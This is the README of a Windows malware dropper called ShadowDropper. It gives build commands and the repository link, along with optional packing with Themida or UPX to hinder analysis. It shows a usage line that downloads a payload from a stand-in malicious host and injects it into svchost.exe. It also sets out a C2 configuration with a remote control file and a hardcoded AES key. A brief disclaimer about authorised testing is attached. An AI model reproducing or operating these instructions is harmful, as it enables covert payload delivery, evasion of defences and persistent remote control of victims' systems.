ShadowDropper

Description

ShadowDropper is an advanced utility designed for the covert delivery and execution of payloads within a target system. This tool was developed as a demonstration platform for professional network and system security testing, leveraging encryption, process injection, and remote management to ensure maximum stealth. ShadowDropper is ideal for penetration testers and security researchers aiming to simulate sophisticated attacks in controlled environments.

Important Warning: This code is intended solely for educational and testing purposes in controlled environments with explicit written consent from system owners. Unauthorized use violates international cybersecurity laws and may result in severe legal consequences.

Key Features

• Covert Delivery: Downloads and executes files from remote servers without detection.
• Process Injection: Injects payloads into trusted system processes, such as svchost.exe.
• Data Encryption: Utilizes the AES-128 algorithm to secure transmitted data.
• Persistent C2 Channel: Maintains a stable connection for receiving commands and updates.
• Anti-Analysis: Incorporates built-in mechanisms to protect against debugging and behavioral analysis.

Requirements

• Operating System: Windows 7, 10, or 11 (64-bit).
• Dependencies: Installed MSXML6 and Visual C++ Redistributable libraries.
• Connectivity: Access for C2 communication.

Installation and Usage

Compilation

1. Clone the repository: git clone https://github.com/EvilWhales/ShadowDropper.git.
2. Open the project in Microsoft Visual Studio or use the command line.
3. Compile the code: cl ShadowDropper.c /link msxml6.lib advapi32.lib ntdll.lib shlwapi.lib /O2 /DNDEBUG.
4. (Optional) Apply binary obfuscation using specialized tools (e.g., Themida or UPX) for enhanced protection.

Execution

• Without Arguments: ShadowDropper.exe — automatically connects to the C2 server and executes received commands.
• With Arguments: ShadowDropper.exe https://malicious.com/payload.exe C:\Temp\payload.exe "CustomAgent" inject svchost.exe — specify the URL, save path, user agent, and target process for injection.

C2 Server Configuration

1. Create a control.bin file on the server https://shadow.dark/control.bin with the content: https://malicious.com/payload.exe;C:\Temp\payload.exe;CustomAgent;inject;svchost.exe (separator — ;).
2. Encrypt the file using the encryption key: {0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88}. Use a tool like OpenSSL for AES-128 encryption.
3. Host the encrypted file on an accessible server.

License

This project is distributed under the MIT License. Usage is restricted to lawful purposes, such as security testing with system owners’ consent. The author is not liable for any illegal activities conducted with this code.